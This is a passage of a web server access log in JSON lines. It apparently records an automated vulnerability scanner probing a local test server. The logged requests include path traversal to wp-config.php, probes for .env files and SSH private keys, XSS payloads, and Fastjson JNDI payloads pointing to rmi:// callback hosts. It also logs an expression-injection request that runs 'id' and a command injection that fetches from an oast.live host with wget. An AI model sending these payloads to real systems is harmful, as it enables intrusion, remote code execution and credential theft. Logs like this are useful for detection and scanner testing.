HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.532","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.495","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/12 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.535","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A 00000001-00000001\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A <_this xsi:type=\x22ManagedObjectReference\x22 type=\x22ServiceInstance\x22>ServiceInstance\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /sdk/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.437","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.449","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.423","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.424","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /id_dsa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.455","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.493","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql/v1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22token\x22: \x22Test\x22},\x22method\x22:\x22web.LoginSTS\x22}","remote_addr":"172.24.0.1","http_host":"c9oms3gsmpve1ijt0mc034s9p5ejkfkwt.oast.live","request":"POST /minio/webrpc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.434","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.470","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.543","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/swagger/ui/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.454","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /password.jsn HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"{\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9oms3gsmpve1ijt0mc09qo8iqrzrt8by.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.396","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /data?get=prodServerGen HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.442","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.474","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /loggers HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.432","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/13 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.481","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.ssh/id_rsa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/pdf-invoices/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.090","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"username=admin&password=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:48 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /je/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.426","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/loggers HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /__swagger__/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.461","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.424","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.841","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9oms3gsmpve1ijt0mc0cg7e65pqp5j1a.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.499","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://c9oms3gsmpve1ijt0mc04ceypecoi131h.oast.live; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"7.129","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.483","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.484","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.458","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.378","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /env.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.373","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.473","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.471","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /info HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.470","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:49 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / 